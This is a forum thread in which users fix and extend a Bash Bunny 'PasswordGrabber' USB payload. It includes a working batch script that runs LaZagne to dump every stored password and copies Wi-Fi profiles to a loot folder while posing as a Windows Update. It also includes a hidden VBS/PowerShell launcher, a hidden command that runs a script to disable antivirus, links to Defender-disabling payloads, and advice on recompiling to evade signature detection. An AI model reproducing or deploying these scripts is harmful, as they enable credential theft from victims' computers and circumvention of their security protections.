Jump to content

PasswordGrabber by LazaGne Not Working


Cech
 Share

Recommended Posts

Hey guys, I've recently bought Bash Bunny and I've tried to  set PasswordGrabber on Switch2, I've copied all the files (d.exe, e.exe, i.vbs, lazagne.exe, lazagne.py, payload.txt and readme.md), once I switch it from arming mode to switch2 (attack mode) and I place it into a victim's PC (test pc) on windows 10, the green LED starts to flash within few seconds (which probably means to remove it right?)

 

Once I remove it and switch it back to arming mode on my PC, I get empty directories and empty notepad files. Can anyone please tell me if I'm doing something wrong? 

 

Thank you in advance guys

Link to comment
Share on other sites

The problem I found with the current version of e.cmd is that it does not create a legit file name for the directory. There are also inconsistencies in the use of the base directory.

Here is the one I edited so that it works for illustration.  I also attached the version of it I created and which works, tested on latest windows 10.  If the Virus scanner blocked Lazagna, then the directory would be created.   Notice the formatting of drec, then the use of dst instead of drec.  Also notice the inconsistent use of loot/passwordgrabber and loot/usbexfiltration  I am continuing to investigate and improve this payload.

Following is for illustration, actual e.cmd is attached.

@echo off
@echo Installing Windows Update

setlocal
cd /d %~dp0

REM Time and Date
set drec=%COMPUTERNAME%_%date%_%TIME: =0%
REM make drec a legit filename.
set drec=%drec: =_%
set drec=%drec::=%
set drec=%drec:/=_%
set drec=%drec:.=_%
set dst=%~dp0\..\..\loot\USB_Exfiltration\%drec%
mkdir %dst% >>nul

REM This executes LaZagne in the current directory and outputs the password file to Loot
REM %~dp0\laZagne.exe all -v > "%~dp0\..\..\loot\PasswordGrabber\%drec%\passwords.txt"
%~dp0\laZagne.exe all -v > "%dst%\passwords.txt"

if Exist c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* (
xcopy /C /Q /G /Y /E c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* %dst% >>nul
)

REM Blink CAPSLOCK key
start /b /wait powershell.exe -nologo  -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"

@cls
@exit
 

e.cmd

Link to comment
Share on other sites

Nice edits, I also made a few small changes myself. I edited i.vbs to call the .cmd file directly...seems to have no bugs in my testing. 

i.vbs

Set objShell = CreateObject("WScript.Shell")



strPath = Wscript.ScriptFullName


Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFile = objFSO.GetFile(strPath)
strFolder = "powershell -nologo -WindowStyle Hidden -ExecutionPolicy unrestriced " & objFSO.GetParentFolderName(objFile) & "\e.cmd"




objShell.Run strFolder


 

and then just remove %~dp0\e.cmd from d.cmd

Link to comment
Share on other sites

  • 2 months later...
14 hours ago, Am3ience said:

isn't there also a problem with the Passwordgrabber payload wanting the Lazagne.exe in the tools folder. But everytime you re-arm the bunny it deletes the .exe

You could paste a little piece of code before that that disables the av:

RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\disable-anti-virus.ps1')"

That was the code and then you need this file:

https://github.com/CIPH3R0/BashBunny/blob/master/USB-PWNR/disable-anti-virus.ps1

  • Like 1
Link to comment
Share on other sites

1 hour ago, C1PH3R said:

You could paste a little piece of code before that that disables the av:

RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\disable-anti-virus.ps1')"

That was the code and then you need this file:

https://github.com/CIPH3R0/BashBunny/blob/master/USB-PWNR/disable-anti-virus.ps1

I had AV disabled on my computer that was re-arming the bunny, and the .exe still disappeared.

Link to comment
Share on other sites

  • 1 month later...
12 hours ago, Spoonman said:

 

Yea, windows defender needs to be turned off, I just started playing around with this, maybe I can find something to auto-turn it off if that's even possible

A better would be to compile the code yourself and add a couple of comments to change the file signature.

Link to comment
Share on other sites

  • 2 weeks later...

I have been playing with Python for hours trying to figure out how to compile this.  It can't be that complicated.  I got 2.7, used pip to install all the dependencies and tried cx_freeze and I get errors.  Is there an ealier version of Pythin or somewhere that gives compile instructions?

Link to comment
Share on other sites

  • 2 weeks later...
2 hours ago, DennisVeninga said:

I've modified this payload for disabling Windows Defender (only) and activating again after finishing.

https://github.com/DennisVeninga/BashBunny-Projects/tree/master/PasswordGrabber-v2

I have done that you say and it doesn't work for. Why? I am new at this, help

Link to comment
Share on other sites

  • 3 weeks later...
On 11/25/2017 at 5:50 PM, Struthian said:

The problem I found with the current version of e.cmd is that it does not create a legit file name for the directory. There are also inconsistencies in the use of the base directory.

Here is the one I edited so that it works for illustration.  I also attached the version of it I created and which works, tested on latest windows 10.  If the Virus scanner blocked Lazagna, then the directory would be created.   Notice the formatting of drec, then the use of dst instead of drec.  Also notice the inconsistent use of loot/passwordgrabber and loot/usbexfiltration  I am continuing to investigate and improve this payload.

Following is for illustration, actual e.cmd is attached.

@echo off
@echo Installing Windows Update

setlocal
cd /d %~dp0

REM Time and Date
set drec=%COMPUTERNAME%_%date%_%TIME: =0%
REM make drec a legit filename.
set drec=%drec: =_%
set drec=%drec::=%
set drec=%drec:/=_%
set drec=%drec:.=_%
set dst=%~dp0\..\..\loot\USB_Exfiltration\%drec%
mkdir %dst% >>nul

REM This executes LaZagne in the current directory and outputs the password file to Loot
REM %~dp0\laZagne.exe all -v > "%~dp0\..\..\loot\PasswordGrabber\%drec%\passwords.txt"
%~dp0\laZagne.exe all -v > "%dst%\passwords.txt"

if Exist c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* (
xcopy /C /Q /G /Y /E c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* %dst% >>nul
)

REM Blink CAPSLOCK key
start /b /wait powershell.exe -nologo  -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"

@cls
@exit
 

e.cmd

Hello you ahve function USB_Exfiltration and PasswordGrabber ? could you share the files please?


 
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...